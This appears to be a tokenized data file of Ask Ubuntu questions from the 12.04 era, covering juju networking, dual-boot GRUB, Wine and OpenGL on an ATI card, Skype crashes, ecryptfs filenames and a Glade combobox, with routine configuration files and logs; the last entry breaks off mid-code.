139208	how can i access local juju instances from other network hosts ?	i 'm running juju on a headless machine , and already have networking configured so the rest of the network can connect to lxc guests deployed using the br0 bridge . unfortunately , juju creates it 's own virtbr0 . i 'd like to be able to access my juju instances from other networked devices , but currently i can only access them from the juju host . any tips ? i 'm happy with either something that let 's me route to the juju subnet , or to get juju instances to deploy using br0 . here 's some info on the current network setup : root @ ragnarok : ~ # ifconfig -a br0 link encap : ethernet hwaddr 0e:31:50 : b7:42:15 inet addr:192.168.1.110 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :3ed9:2bff : fe0b:1ee/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:368136 errors:0 dropped:0 overruns:0 frame:0 tx packets:448695 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:86744921 ( 86.7 mb ) tx bytes:225010392 ( 225.0 mb ) eth0 link encap : ethernet hwaddr 3c : d9:2b:0b:01 : ee up broadcast running multicast mtu:1500 metric:1 rx packets:403922 errors:0 dropped:0 overruns:0 frame:0 tx packets:482977 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:121619070 ( 121.6 mb ) tx bytes:229584532 ( 229.5 mb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:39616 errors:0 dropped:0 overruns:0 frame:0 tx packets:39616 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:77037707 ( 77.0 mb ) tx bytes:77037707 ( 77.0 mb ) lxcbr0 link encap : ethernet hwaddr 42:17:6e:6e : da:02 inet addr:10.0.3.1 bcast:10.0.3.255 mask:255.255.255.0 inet6 addr : fe80 : :4017:6eff : fe6e : da02/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:268 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:23000 ( 23.0 kb ) veth6xdwfd link encap : ethernet hwaddr 92:52:9b:2d:30 : be inet6 addr : fe80 : :9052:9bff : fe2d:30be/64 scope : link up broadcast running promisc multicast mtu:1500 metric:1 rx packets:15890 errors:0 dropped:0 overruns:0 frame:0 tx packets:121216 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1433414 ( 1.4 mb ) tx bytes:28807169 ( 28.8 mb ) vethsuh9q7 link encap : ethernet hwaddr 0e:31:50 : b7:42:15 inet6 addr : fe80 : :c31:50ff : feb7:4215/64 scope : link up broadcast running promisc multicast mtu:1500 metric:1 rx packets:1544 errors:0 dropped:0 overruns:0 frame:0 tx packets:100924 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:121236 ( 121.2 kb ) tx bytes:6347816 ( 6.3 mb ) virbr0 link encap : ethernet hwaddr 00:00:00:00:00:00 inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:5993 errors:0 dropped:0 overruns:0 frame:0 tx packets:11778 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:479255 ( 479.2 kb ) tx bytes:15580755 ( 15.5 mb ) root @ ragnarok : ~ # ip route default via 192.168.1.1 dev br0 metric 100 10.0.3.0/24 dev lxcbr0 proto kernel scope link src 10.0.3.1 192.168.1.0/24 dev br0 proto kernel scope link src 192.168.1.110 192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1 root @ ragnarok : ~ # route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 100 0 0 br0 10.0.3.0 0.0.0.0 255.255.255.0 u 0 0 0 lxcbr0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 br0 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0
139209	gnome session has missing letters , transparency issues , blue screen	i 've install the gnome desktop with sudo apt-get install gnome , as instructed here . it is not working properly , as shown below .
139211	is there a way to run nautilus file manager on 12.04 instead of unity ?	i find nautilus ' gui much more to my liking than unity , and i 've been having a lot of problems with unity , like the menu bar at the top disappearing leaving me with no file specific menus on maximized apps , and no controls for audio volume , no clock , no shutdown menu etc . ( have to use power button to pop up shutdown menu ) . plus unity seems to run much more slowly than nautilus - or is that just 12.04 in general ?
139215	in over my head with thin clients	i have been looking into using an old ( sempron 2200+ ) computer for the kids to play games on . the only problem is flash games run horribly slow , one game installed with wine wo n't even start , and most of the kids games from the software center just run really choppy . i was thinking about setting the old computer up as a thin client and installing ltsp on my main linux box . but the more i look into it the more it looks overly complicated for what i 'm trying to do . i 've also looked into xrdp , but i 'm kind of at a loss as to how to go about doing this . basically i just want my kids to be able to turn on their computer and have a desktop presented to them using the resources of my main box . does anyone have any suggestions or know of any good tutorials to get me started ? edit 2 : removed issue with network manager
139216	cat /proc/filesystems does not list vfat	i 'm trying to read an sd card formatted with a fat32 filesystem . it can be read in windows , but not in ubuntu . when i tried cat /proc/filesystems , this was the output : > cat /proc/filesystems nodev sysfs nodev rootfs nodev bdev nodev proc nodev cgroup nodev cpuset nodev tmpfs nodev devtmpfs nodev debugfs nodev securityfs > nodev sockfs nodev pipefs nodev anon_inodefs nodev devpts ext3 ext4 nodev ramfs nodev hugetlbfs nodev ecryptfs fuseblk nodev fuse nodev fusectl nodev pstore nodev mqueue nodev binfmt_misc i found that vfat was not listed . can someone tell me how this can be changed ?
139223	how to enable hiding grub menu on a dual-boot system ?	with grub 2 , you seem to be able to hide the startup menu ( unless someone presses a certain button ) . but unfortunately grub disables this for multi-os systems , i 've looked up a few other pages . but after one which made me have to re-install ubuntu , i gave up . does anyone know how this can be done on ubuntu 12.04 ?
139226	acer 3935 upgrade to 12.04 - > integrated mic ( drivers ) not working	since updating to 12.04 , the integrated mic is not behaving well . i can not use it with skype to begin with . the mic is not visible in settings > sound > input ( there is nothing ) however i am able to use the sound recorder with it , and opening alsamixed from the terminal seems to show it is working ( not mute ) . the sound card seems to be realtek alc272x . any idea on this ? thank you
139229	screen brightness turns off at boot ?	whenever i boot up ubuntu from the grub menu , the screen brightness goes to zero . and can not see anything unless i turn it up . i know a way to solve this is to press the brightness button until the screen is visible , but it 's annoying having to do that all the time . is there a way to keep it at a certain brightness level ? thanks in advance .
139230	libapache2-redirtoservname package in precise ?	i am not able to find the package libapache2-redirtoservname in precise or oneiric . was it removed for some reason , and is there a way to get it ? thank you .
139237	update manager not working gdm2setup ?	keep getting this error , w : failed to fetch http : //ppa.launchpad.net/gdm2setup/gdm2setup/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/gdm2setup/gdm2setup/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . any help ?
139238	removing ubuntu without losing windows xp	i had a 160 gb hard disk with windows xp . then i installed ubuntu 11.10 64bit . but i did n't knew anything about disk partition . after installation , i only have c drive with 20 gb in xp and about 40 gb in ubuntu . i have the ubuntu in a dvd . how do i remove it and get all the space back in windows xp without losing xp ?
139239	fake a webcam using a video loopback device ?	i want to use a looped video clip as my webcam source in a google+ hangout . i installed v4l2loopback and created a video loopback device . but i have n't figured out how to write the video frames to the device . the given example is : gst-launch videotestsrc ! v4l2sink device=/dev/video1 so after reading the manual page for gst-launch and trying to understand what was going on , i made my feeble attempt : sudo gst-launch-0.10 filesrc location=/home/briankb/videos/darthvaderdancing.mp4 ! v4l2sink device=/dev/video0 which resulted in : setting pipeline to paused ... libv4l2 : error getting pixformat : invalid argument pipeline is prerolling ... pipeline is prerolled ... setting pipeline to playing ... ( gst-launch-0.10:12622 ) : gstreamer-critical ** : gst_caps_get_structure : assertion `gst_is_caps ( caps ) ' failed new clock : gstsystemclock ( gst-launch-0.10:12622 ) : gstreamer-critical ** : gst_structure_get_name : assertion `structure ! = null ' failed caught sigsegv accessing address ( nil ) # 0 0x00007fc1890f0b03 in poll ( ) from /lib/x86_64-linux-gnu/libc.so.6 # 1 0x00007fc18962bff6 in ? ? ( ) from /lib/x86_64-linux-gnu/libglib-2.0.so.0 # 2 0x00007fc18962c45a in g_main_loop_run ( ) # 3 0x00007fc189b5c4cb in gst_bus_poll ( ) # 4 0x0000000000404587 in ? ? ( ) # 5 0x0000000000403c34 in ? ? ( ) # 6 0x00007fc18902b76d in __libc_start_main ( ) # 7 0x00000000004043bd in ? ? ( ) # 8 0x00007fff88253ed8 in ? ? ( ) # 9 0x000000000000001c in ? ? ( ) # 10 0x0000000000000006 in ? ? ( ) # 11 0x00007fff882548c4 in ? ? ( ) # 12 0x00007fff882548d4 in ? ? ( ) # 13 0x00007fff882548dc in ? ? ( ) # 14 0x00007fff88254904 in ? ? ( ) # 15 0x00007fff88254906 in ? ? ( ) # 16 0x00007fff8825490f in ? ? ( ) # 17 0x0000000000000000 in ? ? ( ) spinning . please run 'gdb gst-launch 12622 ' to continue debugging , ctrl-c to quit , or ctrl-\ to dump core . the clip i 'm trying to use an h264 video at 29.97 fps , 320x240 , and in an mp4 container ( it 's from youtube ) .
139246	missing windows 7 when i installed ubuntu 12.4	i am newbie to this i installed ubuntu using separate drive and i choose windows 7 loader as a boot device loader and after the installation i can only choose ubuntu no windows 7 os so please help me to solve this .
139247	why does this file not play as the startup sound ?	i downloaded a 3.9mb song ( .mp3 ) and converted it to ( .ogg ) with this command ffmpeg -i desktop-login.mp3 desktop-login.ogg the file size of the converted file was 23.1mb then i copied it to /usr/share/sounds/ubuntu/stereoand i opened it to check if it got copied ( replaced with the original ) properly , and it was . but when i start the computer the login sound does n't play . now what ?
139256	data recovery through ubuntu 11.10	i have 1tb wd external hdd ( usb3.0 ) . few months back , i do n't know why , files and folders in it became corrupt , i.e i am unable to open them . i tried different recovery software but was unable to recover the data . to further add to the problem , few days back when i attached the drive to the computer , the computer did not recognized it . there was no icon of it in 'my computers ' . i tried to attach the drive to my laptop , but even it did not recognized it . i remember reading somewhere that we can try to recover the data using linux o.s . so , i have created the linux ubuntu 11.10 dvd to try the same . but now i am unable to locate the section which listed the steps to be followed to recover data from external drive . if some one knows the steps for the same , i request him to share the same . this is first time i am using ubuntu and i do n't have any idea about it . i will not be installing the ubuntu but running it in demo mode without actually installing it . desktop computer on which i am running it has windows xp installed on it . i have important and personal files/ photos in it , please help me in recovering it . thanks
139258	how do i repair refit after ubuntu installation ?	after installing ubuntu 12.04 on my dual boot machine with mac os x and ubuntu i no longer see refit when i start the computer . mac os x is listed in the grub menu but i ca n't start it from there . so how do i reinstall refit from ubuntu ? the documentation only explains how to install refit from os x .
139264	in awesome window manager , how do i add vicious widgets ?	i do exactly what it says in the vicious readme , but when i reload the configuration file , no widgets are added to the top bar . so for example , i add : require ( `` vicious '' ) at the top ( after moving the vicious directory in ~/.config/awesome/ ) and : -- initialize widget cpuwidget = widget ( { type = `` textbox '' } ) -- register widget vicious.register ( cpuwidget , vicious.widgets.cpu , `` $ 1 % '' ) later in the config file . i reload the configuration file , and nothing changes . what am i doing wrong ?
139270	dual booting windows and ubuntu	my laptop has 500gb hard disk in which for 250gb i installed windows xp on c drive ( primary partition ) . i want to install ubuntu 12.04 in the remaing hard drive with dual boot option . when i am going to install ubuntu it is showing something like /boot /boot/ can anybody help me in this regard that where and how to install ubuntu ?
139271	ubuntu 12.04 wine opengl initialisation- ati radeon 9200se 5964 ( agp )	after upgrading from ubuntu 10.10 to 12.04 the system had two problems : awkward screen resolution ( 800*600 max . on not recognised full hd monitor ) no directx support in wine , wine is no longer able to initialize opengl hardware : ati radeon 9200se 5964 ( agp ) rgb out connected lg 32ld465 full hd tv-monitor . i managed to solve the screen resolution issue , but run out of ideas with wine . changes to the system : /etc/x11/xorg.conf /usr/share/x11/xorg.conf.d/99-vesahack /etc/gdm/init/default also attached : lg 32ld465 television edid reading ** it was too long to post here : xorg.0.log heroes of might & magic 3 run trial remarks : edid reading is incorrect . tv is capable to run at 1920x1080 60 hz . ubuntu 10.10 worked out of the box , the only change was load `` fglrx '' option in module section of xorg.conf ( just for sure ) , and default color depth set to 16 bit - necessary to run highcolor games in windowed mode . i have set up modelines using cvt & xrandr and added xrandr lines to /etc/gdm/init/default . it worked fine with ubuntu 11.04 , but did n't with 11.10 & 12.04 . so i continued with 99-vesahack and a shiny new xorg.conf . now resolution is ok , but wine keeps crashing , several versions from 1.3.x to 1.5.4 . tested with several executables and desktop environments . also tried out : sudo apt-get remove -- purge fgrlx* sudo apt-get install fglrx-amdcccle-updates fglrx-updates update : i did this : sudo apt-get remove -- purge fglrx* sudo apt-get purge xserver-xorg sudo apt-get install xserver-xorg xserver-xorg-video-all ubuntu-desktop xorg sudo apt-get install libgl1-mesa-swrast now wine is n't crashing , but unusable- way too slow . speed around 1 fps with a game from 1996 . update2 : *after replacing libgl1-mesa-swx11 with libgl1-mesa-glx , now it runs ! * ( practically i have reinstalled & removed again fglrx , and with fglrx came libgl1-mesa-glx ) # apt-get install libgl1-mesa-glx xorg.conf section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` lg : ) '' modelname `` lg 32ld465 '' horizsync 29.6 - 66.6 vertrefresh 59.0 - 70.1 option `` dpms '' modeline `` 1360x768_75.00 '' 109.00 1360 1448 1584 1808 768 771 781 805 -hsync +vsync modeline `` 1360x768_60.00 '' 84.75 1360 1432 1568 1776 768 771 781 798 -hsync +vsync modeline `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync modeline `` 1280x768_60.00 '' 79.50 1280 1344 1472 1664 768 771 781 798 -hsync +vsync modeline `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync modeline `` 800x600_60.00 '' 38.25 800 832 912 1024 600 603 607 624 -hsync +vsync modeline `` 640x480_60.00 '' 23.75 640 664 720 800 480 483 487 500 -hsync +vsync option `` preferredmode '' `` 1360x768_60.00 '' endsection section `` device '' identifier `` device0 '' driver `` radeon '' vendorname `` amd/ati corporation '' option `` vga-0 '' `` monitor0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 16 subsection `` display '' viewport 0 0 depth 16 modes `` 1360x768_60.00 '' `` 1280x1024_60.00 '' `` 1280x768_60.00 '' `` 1024x768_60.00 '' `` 800x600_60.00 '' `` 640x480_60.00 '' endsubsection subsection `` display '' viewport 0 0 depth 24 modes `` 1360x768_60.00 '' `` 1280x1024_60.00 '' `` 1280x768_60.00 '' `` 1024x768_60.00 '' `` 800x600_60.00 '' `` 640x480_60.00 '' endsubsection endsection section `` module '' load `` radeon '' load `` glx '' endsection vesahack section `` device '' identifier `` screen0 '' videoram 128000 endsection init/default # ! /bin/sh # stolen from the debian kdm setup , are n't i sneaky # plus a lot of fun stuff added # -george path= '' /usr/bin : $ path '' old_ifs= $ ifs xrandr -- newmode `` 1360x768_75.00 '' 109.00 1360 1448 1584 1808 768 771 781 805 -hsync +vsync xrandr -- addmode vga-0 `` 1360x768_75.00 '' /sbin/initctl -q emit login-session-start display_manager=gdm gdmwhich ( ) { command= '' $ 1 '' output= ifs= : for dir in $ path do if test -x `` $ dir/ $ command '' ; then if test `` x $ output '' = `` x '' ; then output= '' $ dir/ $ command '' fi fi done ifs= $ old_ifs echo `` $ output '' } sysresources=/etc/x11/xresources # merge in defaults if [ -f `` $ sysresources '' ] ; then xrdb -merge `` $ sysresources '' fi sysmodmap=/etc/x11/xmodmap xmodmap=`gdmwhich xmodmap` if [ `` x $ xmodmap '' ! = `` x '' ] ; then if [ `` x $ gdm_parent_display '' = `` x '' ] ; then if [ -f $ sysmodmap ] ; then $ xmodmap $ sysmodmap fi else ( display= $ gdm_parent_display xauthority= $ gdm_parent_xauthority $ xmodmap -pke ) | $ xmodmap - fi # # switch sun 's alt and meta mod mappings # uname=`gdmwhich uname` processor=` $ uname -p` if [ `` x $ processor '' = `` xsparc '' ] ; then if $ xmodmap | grep mod4 | grep alt > /dev/null 2 > /dev/null then $ xmodmap -e `` clear mod1 '' \ -e `` clear mod4 '' \ -e `` add mod1 = alt_l '' \ -e `` add mod1 = alt_r '' \ -e `` add mod4 = meta_l '' \ -e `` add mod4 = meta_r '' fi fi fi setxkbmap=`gdmwhich setxkbmap` if [ `` x $ setxkbmap '' ! = `` x '' ] ; then # fixme : is this all right ? is this completely on crack ? # what this does is move the xkb configuration from the gdm_parent_display # fixme : this should be done in code . or there must be an easier way ... if [ -n `` $ gdm_parent_display '' ] ; then xkbsetup=` ( display= $ gdm_parent_display xauthority= $ gdm_parent_xauthority $ setxkbmap -v ) ` if [ -n `` $ xkbsetup '' ] ; then xkbkeymap=`echo `` $ xkbsetup '' | grep '^keymap ' | awk ' { print $ 2 } '` xkbtypes=`echo `` $ xkbsetup '' | grep '^types ' | awk ' { print $ 2 } '` xkbcompat=`echo `` $ xkbsetup '' | grep '^compat ' | awk ' { print $ 2 } '` xkbsymbols=`echo `` $ xkbsetup '' | grep '^symbols ' | awk ' { print $ 2 } '` xkbgeometry=`echo `` $ xkbsetup '' | grep '^geometry ' | awk ' { print $ 2 } '` if [ -n `` $ xkbkeymap '' ] ; then $ setxkbmap -keymap `` $ xkbkeymap '' elif [ -n `` $ xkbtypes '' -a -n `` $ xkbcompat '' -a -n `` $ xkbsymbols '' -a -n `` $ xkbgeometry '' ] ; then $ setxkbmap -types `` $ xkbtypes '' -compat `` $ xkbcompat '' -symbols `` $ xkbsymbols '' -geometry `` $ xkbgeometry '' elif [ -n `` $ xkbtypes '' -a -n `` $ xkbcompat '' -a -n `` $ xkbsymbols '' ] ; then $ setxkbmap -types `` $ xkbtypes '' -compat `` $ xkbcompat '' -symbols `` $ xkbsymbols '' elif [ -n `` $ xkbsymbols '' ] ; then $ setxkbmap -symbols `` $ xkbsymbols '' fi fi fi fi exit 0 sudo get-edid | parse-edid parse-edid : parse-edid version 2.0.0 [ sudo ] password for enzo : get-edid : get-edid version 2.0.0 performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 200 vbe string at 0x2110 `` ati radeon 9200 '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination does not support ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call failed the edid data should not be trusted as the vbe call failed edid claims 19 more blocks left edid blocks left is wrong . your edid is probably invalid . parse-edid : edid checksum failed - data is corrupt . continuing anyway . parse-edid : first bytes do n't match edid version 1 header parse-edid : do not trust output ( if any ) . # edid version 19 revision 19 section `` monitor '' identifier `` dxs:1313 '' vendorname `` dxs '' modelname `` dxs:1313 '' # dpms capabilities : active off : no suspend : no standby : no mode `` 275x275 '' # vfreq 43.295hz , hfreq 45.979khz dotclock 48.830000 htimings 275 294 313 1062 vtimings 275 276 327 1062 endmode mode `` 275x275 '' # vfreq 43.295hz , hfreq 45.979khz dotclock 48.830000 htimings 275 294 313 1062 vtimings 275 276 327 1062 endmode mode `` 275x275 '' # vfreq 43.295hz , hfreq 45.979khz dotclock 48.830000 htimings 275 294 313 1062 vtimings 275 276 327 1062 endmode mode `` 275x275 '' # vfreq 43.295hz , hfreq 45.979khz dotclock 48.830000 htimings 275 294 313 1062 vtimings 275 276 327 1062 endmode endsection env wineprefix= '' /home/enzo/.wine '' wine c : \windows\command\start.exe /unix /home/enzo/.wine/dosdevices/c : /windows/profiles/all\ users/start\ menu/programs/3do/heroes\ 3\ complete/heroes\ of\ might\ and\ magic\ iii\ complete.lnk fixme : ntoskrnl : keinitializespinlock stub : 0x547d74 fixme : advapi : registertraceguidsw ( 0x100778a , 0x100a060 , { 485e7de8-0a80-11d8-ad15-505054503030 } , 1 , 0x33fde0 , ( null ) , ( null ) , 0x100a068 , ) : stub fixme : advapi : registertraceguidsw ( 0x100778a , 0x100a080 , { 485e7de9-0a80-11d8-ad15-505054503030 } , 1 , 0x33fde0 , ( null ) , ( null ) , 0x100a088 , ) : stub fixme : advapi : registertraceguidsw ( 0x100778a , 0x100a0a0 , { 485e7dea-0a80-11d8-ad15-505054503030 } , 1 , 0x33fde0 , ( null ) , ( null ) , 0x100a0a8 , ) : stub fixme : advapi : registertraceguidsw ( 0x100778a , 0x100a0c0 , { 485e7deb-0a80-11d8-ad15-505054503030 } , 1 , 0x33fde0 , ( null ) , ( null ) , 0x100a0c8 , ) : stub fixme : advapi : registertraceguidsw ( 0x100778a , 0x100a0e0 , { 485e7dec-0a80-11d8-ad15-505054503030 } , 1 , 0x33fde0 , ( null ) , ( null ) , 0x100a0e8 , ) : stub fixme : advapi : registertraceguidsw ( 0x100778a , 0x100a100 , { 485e7ded-0a80-11d8-ad15-505054503030 } , 1 , 0x33fde0 , ( null ) , ( null ) , 0x100a108 , ) : stub fixme : win : registerdevicenotificationw ( hwnd=0x12f918 , filter=0x54e8ec , flags=0x00000001 ) returns a fake device notification handle ! fixme : exec : shell_execute flags ignored : 0x00000100 fixme : exec : shell_execute flags ignored : 0x00004100 err : exec : shell_executew can not return to directory l '' unix\\home\\enzo '' enzo @ picipaci : ~ $ fixme : mcicda : mcicda_geterror unknown mode 1 fixme : mountmgr : harddisk_ioctl unsupported ioctl 24008 ( device=2 access=1 func=2 method=0 ) fixme : mcicda : mcicda_geterror unknown mode 1 fixme : mountmgr : harddisk_ioctl unsupported ioctl 24008 ( device=2 access=1 func=2 method=0 ) xlib : extension `` glx '' missing on display `` :0.0 '' . err : wgl : x11drv_winegl_initopenglinfo could n't initialize opengl , expect problems err : d3d_caps : wined3d_createfakeglcontext ca n't find a suitable ipixelformat . err : d3d : initadapters failed to get a gl context for default adapter err : ddraw : ddraw_create_swapchain failed to create swapchain , hr 0x8876086c . err : ddraw : ddraw7_setcooperativelevel failed to create swapchain , hr 0x8876086c . wine : unhandled page fault on read access to 0x0000001c at address 0x7cdaf27b ( thread 0035 ) , starting debugger ... ca n't attach process 0034 : error 5 err : ddraw : ddraw_create_swapchain failed to create swapchain , hr 0x8876086c . err : ddraw : ddraw7_setcooperativelevel failed to create swapchain , hr 0x8876086c . xdpyinfo name of display : :0.0 version number : 11.0 vendor string : the x.org foundation vendor release number : 11103000 x.org version : 1.11.3 maximum request size : 16777212 bytes motion buffer size : 256 bitmap unit , bit order , padding : 32 , lsbfirst , 32 image byte order : lsbfirst number of supported pixmap formats : 7 supported pixmap formats : depth 1 , bits_per_pixel 1 , scanline_pad 32 depth 4 , bits_per_pixel 8 , scanline_pad 32 depth 8 , bits_per_pixel 8 , scanline_pad 32 depth 15 , bits_per_pixel 16 , scanline_pad 32 depth 16 , bits_per_pixel 16 , scanline_pad 32 depth 24 , bits_per_pixel 32 , scanline_pad 32 depth 32 , bits_per_pixel 32 , scanline_pad 32 keycode range : minimum 8 , maximum 255 focus : window 0x3c00005 , revert to parent number of extensions : 26 big-requests composite damage double-buffer dpms dri2 generic event extension mit-screen-saver mit-shm randr record render security shape sync x-resource xc-misc xfixes xfree86-dga xfree86-vidmodeextension xinerama xinputextension xkeyboard xtest xvideo xvideo-motioncompensation default screen number : 0 number of screens : 1 screen # 0 : dimensions : 1360x768 pixels ( 359x203 millimeters ) resolution : 96x96 dots per inch depths ( 7 ) : 16 , 1 , 4 , 8 , 15 , 24 , 32 root window id : 0x62 depth of root window : 16 planes number of colormaps : minimum 1 , maximum 1 default colormap : 0x20 default number of colormap cells : 64 preallocated pixels : black 0 , white 65535 options : backing-store no , save-unders no largest cursor : 64x64 current input event mask : 0xfac033 keypressmask keyreleasemask enterwindowmask leavewindowmask keymapstatemask exposuremask structurenotifymask substructurenotifymask substructureredirectmask focuschangemask propertychangemask colormapchangemask number of visuals : 3 default visual id : 0x21 visual : visual id : 0x21 class : truecolor depth : 16 planes available colormap entries : 64 per subfield red , green , blue masks : 0xf800 , 0x7e0 , 0x1f significant bits in color specification : 6 bits visual : visual id : 0x22 class : directcolor depth : 16 planes available colormap entries : 64 per subfield red , green , blue masks : 0xf800 , 0x7e0 , 0x1f significant bits in color specification : 6 bits visual : visual id : 0x60 class : truecolor depth : 32 planes available colormap entries : 256 per subfield red , green , blue masks : 0xff0000 , 0xff00 , 0xff significant bits in color specification : 8 bits
139279	skype on 12.04 x64 does not start even after purging and reinstalling it	i am wondering if there 's anyone here who managed to use skype on 12.04 . it used to work ( ever since i first tried ubuntu 10.04 ) flawlessly , but after upgrading to 12.04 , it just does n't start . if i start skype from terminal , it just says segmentation fault ( core dumped ) . i tried to remove skype and installed it from different locations : skype website ( did not install at all , `` package error '' ) from official ubuntu repository ( does n't start at all , segmentation fault ) from repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' ( does n't start at all , segmentation fault ) interesting thing : even if i remove / purge skype from the system , it still shows up in unity menu ( of course does n't start ) . any help here ?
139280	how do i install alientvault siem manually ?	alienvault by defult is a .iso image . it installed on the core of debian . i want to install it on ubuntu 12.04 . how can i do that ? ! or is it possible or not ? ! ( alienvault is a siem product , it is an open source monitoring security logs .. , and use in security operations center . due to some reasons i need to installing it on ubuntu . all the files of this product are in pool directory of its debian .iso image . ) .
139282	new problem-on-12-04-with-gimp-2-8	i have the same problem stated here problem on 12.04 with gimp 2.8 but it is impossible to install ppa-purge , because of the fact that ubuntu software centre does n't work anymore saying me i 've to repair the dameged packages , but when i try to do it it does n't work ... like for leonardo ... . how can i do to repair the ubuntu software centre and repair gimp ? thanks .
139283	hplip mount on startup problem	situation : clean install of 12.04 and of hplip 3.12.4 . the printer is detected and installed correctly . the problem starts afterwards . whenever entering the session , hplip starts and is shown on the menu bar ( in 11.10 , hplip did n't show until the printer was plugged in ) . when plugging in the printer , hplip gives a 'devise communication error ' , and wo n't print . workaround : after much fooling around , i 've found that i can uninstal the printer , then plug the printer in , hplip detects it and voilรก , it 'll print . sometimes , the program will show a message hplip already mounted , so that might be part of the problem . also , hplip creates a 'system problem ' , but the report never goes anywhere ... i 'd like to be able to troubleshoot this problem , or should i just wait until a new version of hplip is released . i think this problem affects more people . edit : forgot to mention . when plugging the printer in , hplip will add another printer instead of recognising that the printer is already installed . status update : solved the problem was the hplip download . i downloaded version 3.12.4 , but the correct version is 3.12.2 ... as indicated by hplip ... but the link goes to the next version . i uninstalled everything . installed 3.12.2 . in the end it all works .
139287	what are ecryptfs_fnek_encrypted files and folders for ?	i 've moved my home folder from an old to a new computer using this howto . the old machine was running xubuntu 11.10 the new is running ubuntu 12.04 64bit . on both machines the users where created with encrypted home folder turned on . besides other oddities i have now 31 folders and 25 files in my home directory which start with ecryptfs_fnek_encrypted . ... why are these files there ? what are they for ? how can i get rid , switch off , hide them ... . basically get back to where it was before ?
139288	password reconnecting to wireless network ubuntu 12.04 ?	i am using ubuntu 12.04 with gnome-classic , and every time the wireless goes down , be it because i lose signal or some other reason , my laptop automatically tries to reconnect but i am asked to confirm the wireless password details in a window like this : authentication required by wireless network password or encryption keys are required to access the wireless network 'abc1234 ' . password : ********* cancel / ok the password is saved in the system , i do n't have to type it again , but the window keeps popping up for every reconnection and i need to click the 'ok ' button every time . is there a way to avoid having to click 'ok ' every time it tries to reconnect , since the password is already stored in the system ?
139290	aptoncd not reflecting all applications installed in 12.04	well i 'm trying to back up all the applications i installed using aptoncd however after installed launching the package , it only shows applications i installed yesterday ( ktouch & gdebi ) . how do i make aptoncd to recognize all application and libs installed ? btw i was having problems with apt-get so i did a sudo apt-get clean & & sudo apt-get autoclean to fix the issue successfully .
139293	how to make a gtk.comboboxtext 's entry editable in glade	i 'm using glade to write a pygi app , and i 've come across a problem whereby i 've got a gtk.comboboxtext with a gtk.entry , but i can not make the entry editable for some reason . i.e . when the ui is loaded , there is no way to input text in it . i 've looked at all the entry 's properties and also those of the comboboxtext parent , but i could not find anything obvious that i 'm missing . oddly enough , if i create it with code only ( i.e . with no glade .ui files ) , that seems to work and the entry is then editable . this code does not work code : # ! /usr/bin/env python from gi.repository import gtk class combo : def __init__ ( self ) : builder = gtk.builder ( ) builder.add_from_file ( 'combo.ui ' ) window = builder.get_object ( 'window1 ' ) window.connect ( 'destroy ' , lambda w : gtk.main_quit ( ) ) window.show_all ( ) combo ( ) gtk.main ( ) glade file : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < interface > < ! -- interface-requires gtk+ 3.0 -- > < object class= '' gtkwindow '' id= '' window1 '' > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkcomboboxtext '' id= '' comboboxtext1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' has_entry '' > true < /property > < property name= '' entry_text_column '' > 0 < /property > < property name= '' id_column '' > 1 < /property > < child internal-child= '' entry '' > < object class= '' gtkentry '' id= '' comboboxtext-entry '' > < property name= '' can_focus '' > false < /property > < /object > < /child > < /object > < /child > < /object > < /interface > this code works # ! /usr/bin/env python from gi.repository import gtk class combo : def __init__ ( self ) : window = gtk.window ( ) window.set_default_size ( 200 , 200 ) combo = gtk.comboboxtext.new_with_entry ( ) 